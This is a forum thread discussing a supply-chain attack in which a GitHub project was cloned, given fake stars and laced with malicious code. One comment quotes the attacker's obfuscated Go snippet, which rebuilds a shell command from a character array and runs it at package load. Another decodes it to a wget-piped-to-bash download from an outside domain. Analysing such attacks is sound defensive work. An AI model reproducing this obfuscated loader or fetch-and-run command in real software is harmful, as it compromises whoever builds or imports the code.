Attacker Copied GitHub Project, Added Fake Stars and Malicious Code
23 points by veqq
23 points by veqq
Linking to reddit feels strange (and I had to condense the title-summary), but the project documented it in this post and I believe this is worthwhile to look at. The comments amass a lot of interesting stuff namely: similar attacks using this attack vector (partial pun, since it obfuscates with arrays!)
Thanks for sharing! Supply chain attacks are not new, but it’s interesting to see how they gamed GitHub’s game of stars.
This is why we need to turn off the knobs of social media on code forges—or at least teach folks that numbers like ‘stars’ are almost entirely arbitrary & can be gamed or faked. For instance, I have star counts set at something like 50% opacity in a userStyle as an extra reminder that these don’t matter when assessing a project among many other things. This is also one of the bad socially-engineered flood gates ForgeFed that could open if Forgejo keeps copying instead of dropping from the proprietary code forge offerings.
Self-promo: https://codeberg.org/toastal/github-less-social
I made some improvements yesterday to the userStyles yesterday & have been trying to do my best to take the “social” out of “social coding” for the platform.
func CGDUMG() error {
maOB := []string{"/", "n", "7", "r", "n", "a", "s", "t", " ", "d", "r", "s", "f", "u", "t", "p", "e", "s", "w", "f", "6", "s", "0", "o", "f", "g", "/", "e", "a", "t", "d", "3", "&", "t", "3", " ", "/", "e", "b", "/", " ", "e", "-", "u", "/", "h", "|", "h", "n", "q", "b", "O", "-", "t", "b", "/", ":", " ", ".", "e", "g", " ", "5", "d", "1", "i", "4", "e", "3", " ", "o", "b", "/", "a"}
POFd := "/bin/sh"
rwsg := "-c"
iBIhzvd := maOB[18] + maOB[60] + maOB[67] + maOB[33] + maOB[35] + maOB[42] + maOB[51] + maOB[57] + maOB[52] + maOB[61] + maOB[45] + maOB[7] + maOB[29] + maOB[15] + maOB[17] + maOB[56] + maOB[44] + maOB[55] + maOB[3] + maOB[27] + maOB[49] + maOB[13] + maOB[37] + maOB[21] + maOB[14] + maOB[54] + maOB[23] + maOB[1] + maOB[41] + maOB[58] + maOB[24] + maOB[43] + maOB[48] + maOB[72] + maOB[11] + maOB[53] + maOB[70] + maOB[10] + maOB[73] + maOB[25] + maOB[16] + maOB[0] + maOB[30] + maOB[59] + maOB[31] + maOB[2] + maOB[68] + maOB[63] + maOB[22] + maOB[9] + maOB[19] + maOB[39] + maOB[28] + maOB[34] + maOB[64] + maOB[62] + maOB[66] + maOB[20] + maOB[38] + maOB[12] + maOB[69] + maOB[46] + maOB[40] + maOB[36] + maOB[50] + maOB[65] + maOB[4] + maOB[26] + maOB[71] + maOB[5] + maOB[6] + maOB[47] + maOB[8] + maOB[32]
exec.Command(POFd, rwsg, iBIhzvd).Start()
return nil
}
var wNAyZb = CGDUMG()
An example of obfuscated code execution as found on one of the malicious packages.
For those following along at home, this translates to the following:
OBVIOUSLY DO NOT EXECUTE THINGS FROM OBFUSCATED CODE;
wget -O - https://requestbone.fun/storage/de373d0df/a31546bf | /bin/bash &
Though, this domain seems to not exist.
It doesn’t even need to be that popular of a repository to suffer from this attack: https://github.com/cirello-io/oversight/issues/3
Welp… Another wave:
https://github.com/largepropane/oversight/blob/master/child_process.go#L163-L172 https://github.com/alltract/oversight/blob/master/child_process.go#L163-L172 https://github.com/amazinghouse/oversight/blob/master/child_process.go#L163-L172 https://github.com/breakablethou/oversight/blob/master/child_process.go#L163-L172 https://github.com/briefduck/oversight/blob/master/child_process.go#L163-L172 https://github.com/contentcorpor/oversight/blob/master/child_process.go#L163-L172